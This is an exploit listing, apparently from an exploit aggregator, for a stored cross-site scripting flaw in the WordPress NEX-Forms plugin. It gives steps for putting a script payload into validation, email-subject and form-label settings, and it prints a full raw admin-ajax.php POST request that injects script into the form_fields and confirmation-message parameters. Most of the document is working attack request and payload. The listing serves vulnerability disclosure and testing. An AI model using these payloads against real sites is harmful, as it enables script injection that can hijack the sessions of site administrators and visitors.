## https://sploitus.com/exploit?id=WPEX-ID:ECA883D8-9499-4DBD-8FE1-4447FC2CA28A
Logged in with an administrator account (the requests below were sent with an admin session), go to Global Settings > Preferences > Validation and enter the following payload in any of the Required Field, Incorrect Email, Incorrect URL or Alphabetical settings: "><script>alert(/XSS/)</script>
Likewise, in Global Settings > Preferences > Emails > Email Autoresponder (User emails) > Subject, enter the same payload: "><script>alert(/XSS/)</script>

The stored payload executes whenever an authenticated user views the NEX-Forms dashboard (/wp-admin/admin.php?page=nex-forms-dashboard), indicating these setting values are rendered there without output escaping.


Alternatively, create a new form, add a Name field and set its Field Label Text to the following payload: "><script>alert(/XSS/)</script> — the equivalent raw request (admin-ajax.php, action=nf_update_record) is shown below, with the payload placed directly in the form_fields and on_screen_confirmation_message_admin parameters:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6228
Connection: close
Cookie: [admin+]

action=nf_update_record&table=wap_nex_forms&edit_Id=2&plugin=shared&title=aa&form_fields=<script>alert(/XSS-form_fields/)</script>&clean_html=dummy&is_form=1&is_template=0&post_type=POST&post_action=ajax&custom_url=&mail_to=admin%40localhost.org&from_address=admin%40localhost.org&from_name=WP&on_screen_confirmation_message=dummy&on_screen_confirmation_message_admin=<script>alert(/XSS-on_screen_confirmation_message_admin/)</script>&google_analytics_conversion_code=&confirmation_page=&user_email_field=&confirmation_mail_subject=WP+-+NEX-Forms+Submission&user_confirmation_mail_subject=WP+-+NEX-Forms+Submission%5C&confirmation_mail_body=Thank+you+for+connecting+with+us.+We+will+respond+to+you+shortly.&on_form_submission=message&form_hidden_fields=&hidden_fields=&conditional_logic=&conditional_logic_array=&admin_email_body=%7B%7Bnf_form_data%7D%7D&bcc=&bcc_user_mail=&custom_css=&form_type=&draft_Id=0&products=&currency_code=USD&email_on_payment_success=&cmd=_cart&lc=US&mc_field_map=&gr_field_map=&mp_field_map=&ms_field_map=&email_subscription=&attach_pdf_to_email=&form_to_post_map=&md_theme%5B0%5D%5Btheme_name%5D=default&md_theme%5B0%5D%5Btheme_shade%5D=light&md_theme%5B0%5D%5Boverall_font%5D=&md_theme%5B0%5D%5Bfield_spacing%5D=15&md_theme%5B0%5D%5Boverall_label_font%5D=&md_theme%5B0%5D%5Boverall_label_font_size%5D=13&md_theme%5B0%5D%5Boverall_label_align%5D=left&md_theme%5B0%5D%5Boverall_label_color%5D=%239e9e9e&md_theme%5B0%5D%5Boverall_label_bold%5D=bold&md_theme%5B0%5D%5Boverall_label_italic%5D=not-italic&md_theme%5B0%5D%5Boverall_label_underline%5D=not-underline&md_theme%5B0%5D%5Boverall_input_font%5D=&md_theme%5B0%5D%5Boverall_input_font_size%5D=13&md_theme%5B0%5D%5Boverall_input_align%5D=left&md_theme%5B0%5D%5Boverall_input_color%5D=%239e9e9e&md_theme%5B0%5D%5Boverall_input_bg_color%5D=white&md_theme%5B0%5D%5Boverall_input_border_color%5D=%23dddddd&md_theme%5B0%5D%5Boverall_input_bold%5D=0&md_theme%5B0%5D%5Boverall_input_italic%5D=0&md_theme%5B0%5D%5Boverall_input
_underline%5D=0&md_theme%5B0%5D%5Boverall_field_corners%5D=normal&md_theme%5B0%5D%5Boverall_icon_font_size%5D=17&md_theme%5B0%5D%5Boverall_icon_color%5D=%23888888&md_theme%5B0%5D%5Boverall_icon_bg_color%5D=white&md_theme%5B0%5D%5Boverall_icon_border_color%5D=%23dddddd&md_theme%5B0%5D%5Boverall_field_errors%5D=modern&md_theme%5B0%5D%5Boverall_field_errors_pos%5D=right&md_theme%5B0%5D%5Bmsg_hide_form%5D=yes&md_theme%5B0%5D%5Bmsg_position%5D=top&md_theme%5B0%5D%5Bmsg_placement%5D=outside&md_theme%5B0%5D%5Bloader_type%5D=ellipsis&md_theme%5B0%5D%5Bloader_color%5D=%2340C4FF&form_theme=bootstrap&jq_theme=default&form_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&msg_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&multistep_settings%5B0%5D%5Bmulti_step_total%5D=0&multistep_settings%5B0%5D%5Bmulti_step_stepping%5D=&multistep_settings%5B0%5D%5Bmulti_step_transition_in%5D=fadeIn&multistep_settings%5B0%5D%5Bmulti_step_transition_out%5D=fadeOut&multistep_settings%5B0%5D%5Bmulti_step_back_disabled%5D=no&multistep_settings%5B0%5D%5Bbreadcrumb_list%5D=%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09&multistep_settings%5B0%5D%5Bbreadcrumb_type%5D=pilled&multistep_settings%5B0%5D%5Btext_pos%5D=text-bottom&multistep_settings%5B0%5D%5Bcrumb_align%5D=align_left&multistep_settings%5B0%5D%5Bbc_position%5D=top&multistep_settings%5B0%5D%5Bdata_theme%5D=default&multistep_settings%5B0%5D%5Bshow_front_end%5D=yes&multistep_settings%5B0%5D%5Bshow_inside%5D=no&multistep_settings%5B0%5D%5Bscroll_to_top%5D=yes&multistep_settings%5B0%5D%5Bform_width_pixels%5D=950&multistep_settings%5B0%5D%5Bform_width_percentage%5D=100&multistep_settings%5B0%5D%5Bform_width_unit%5D=%25&multistep_settings%5B0%5D%5Bmsg
_width_pixels%5D=950&multistep_settings%5B0%5D%5Bmsg_width_percentage%5D=100&multistep_settings%5B0%5D%5Bmsg_width_unit%5D=%25&multistep_settings%5B0%5D%5Bbc_gutter%5D=20&multistep_settings%5B0%5D%5Bbc_folded%5D=bc-unfolded&multistep_settings%5B0%5D%5Bbc_connected%5D=bc-connected&multistep_settings%5B0%5D%5Bbc_style%5D=bc-solid&multistep_settings%5B0%5D%5Bbc_css%5D=&multistep_settings%5B0%5D%5Bbc_converted%5D=1&multistep_settings%5B0%5D%5Badd_timer%5D=no&multistep_settings%5B0%5D%5Btimer_add_to%5D=header&multistep_settings%5B0%5D%5Btimer_type%5D=overall&multistep_settings%5B0%5D%5Benabled_units%5D=minutes%2Cseconds&multistep_settings%5B0%5D%5Btimer_size%5D=small&multistep_settings%5B0%5D%5Btimer_position%5D=timer_inline&multistep_settings%5B0%5D%5Btimer_align%5D=timer_right&multistep_settings%5B0%5D%5Btimer_animation%5D=smooth&multistep_settings%5B0%5D%5Btimer_hours%5D=0&multistep_settings%5B0%5D%5Btimer_minutes%5D=0&multistep_settings%5B0%5D%5Btimer_seconds%5D=30&multistep_settings%5B0%5D%5Btimer_hours_label%5D=&multistep_settings%5B0%5D%5Btimer_minutes_label%5D=&multistep_settings%5B0%5D%5Btimer_seconds_label%5D=&multistep_settings%5B0%5D%5Btimer_hours_color%5D=%232979ff&multistep_settings%5B0%5D%5Btimer_minutes_color%5D=%2300bcd4&multistep_settings%5B0%5D%5Btimer_seconds_color%5D=%2340c4ff&multistep_settings%5B0%5D%5Btimer_direction%5D=clockwise&multistep_settings%5B0%5D%5Btimer_wrapper_css%5D=&multistep_settings%5B0%5D%5Btimer_text_color%5D=%23888888&multistep_settings%5B0%5D%5Btimer_inner_circle_color%5D=%23aaaaaa&multistep_settings%5B0%5D%5Btimer_bg_width%5D=0.1&multistep_settings%5B0%5D%5Btimer_fg_width%5D=0.05&multistep_settings%5B0%5D%5Btimer_start%5D=1&multistep_settings%5B0%5D%5Btimer_end%5D=0&multistep_html=dummy&upload_settings%5B0%5D%5Bupload_to_server%5D=true&attachment_settings%5B0%5D%5Battach_to_admin_email%5D=true&option_settings%5B0%5D%5Bsave_form_progress%5D=false&option_settings%5B0%5D%5Bsubmit_limit%5D=&option_settings%5B0%5D%5Bsubmit_limit_msg
%5D=&option_settings%5B0%5D%5Bsend_admin_email%5D=true&option_settings%5B0%5D%5Bbefore_submit_js%5D=return+true%3B&option_settings%5B0%5D%5Bafter_submit_js%5D=return+true%3B